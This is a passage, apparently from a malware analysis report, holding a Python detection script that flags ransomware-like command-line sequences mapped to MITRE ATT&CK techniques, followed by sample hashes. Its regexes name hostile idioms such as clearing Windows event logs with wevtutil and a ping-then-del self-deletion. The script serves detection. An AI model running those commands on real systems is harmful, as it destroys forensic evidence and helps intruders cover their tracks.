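    ('T1070.001 Clear Windows Event Logs', r'^(?:.*\\)?wevtutil(?:\.exe)? cl '),
    ('T1486 Data Encrypted for Impact (ransom note opened)', r'^(?:.*\\)?notepad(?:\.exe)? .*how_to_decrypt'),
    ('T1070.004 File Deletion (delayed self-delete)', r'ping(?:\.exe)? -n \d+ 127\.0\.0\.1 && del '),
]]

SELF_DEL_RE = re.compile(r'&&\s*del\s+"?([^"]+?)"?\s*$', re.IGNORECASE)


def classify(cmdline: str) -> set:
    """Labels of every rule the command line triggers (empty set if none)."""
    low = cmdline.lower()
    return {label for label, rx in RULES if rx.search(low)}


def summarize(events) -> Counter:
    """Count hits per technique over a batch of events."""
    counts = Counter()
    for ev in events:
        counts.update(classify(ev.cmdline))
    return counts


def self_delete_targets(events):
    """Events whose '... && del <path>' target is their parent's own image:
    the ping-then-del idiom the sample uses to remove itself from disk."""
    by_pid = {ev.pid: ev for ev in events}
    hits = []
    for ev in events:
        m = SELF_DEL_RE.search(ev.cmdline)
        parent = by_pid.get(ev.ppid)
        if m and parent and m.group(1).lower() == parent.image.lower():
            hits.append((ev.pid, m.group(1)))
    return hits


def verdict(events, min_families: int = 4) -> bool:
    """True when enough distinct technique families appear in one batch that
    it looks like a ransomware pre-encryption sequence, not a lone admin command."""
    families = {label.split(' ')[0] for label in summarize(events)}
    return len(families) >= min_families


if __name__ == '__main__':
    for label, n in sorted(summarize(EVENTS).items()):
        print(f'{n:2d}  {label}')
    print('self-delete:', self_delete_targets(EVENTS))
    print('ransomware-like sequence:', verdict(EVENTS))
```

Each rule on its own is noisy (an administrator does run sc config and bcdedit), which is why the verdict counts distinct technique families in one batch rather than firing on any single hit; the self-delete check is the one rule that is specific on its own, because legitimate software does not ask cmd.exe to delete its parent after a five-ping delay.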
Network
MITRE ATT&CK Enterprise v6
Downloads
-
MD5
9d3e4af36fcaeae21b659744acaea5ff
SHA1
f5f10926e75e0e2b2a687957211f7a415a315a7b
SHA256
155af800ee95992ea5afcd163da8f3b4dd4b3ba20368031cc4f97b39cc23a175
SHA512
05983dc926079832294182b17f86196cfd7f6f3a70893774283baa98fb717d4419b54e22c0de1c4d593d12842be886f8a8eed633553de3b5a7f7c4803eefc896
-
MD5
8592ba100a78835a6b94d5949e13dfc1
SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
MD5
d81918b1c01f5ae53ad4afb0824da5e4
SHA1
e0471b288182be00b98d8bcc5082735a4f454cb5
SHA256
cb8d484e0487a9d5499393604444b127ff494cce575e97da719afbc87ba66509
SHA512
3fae65360f90cce5c5cb55258015a1ea765c1e897db6267ea962ec1ee2be4dbc71ea7df73b2d8a1dcd9e8d377c5e7b051ba91d68f082c068d435fbc241bd0ae3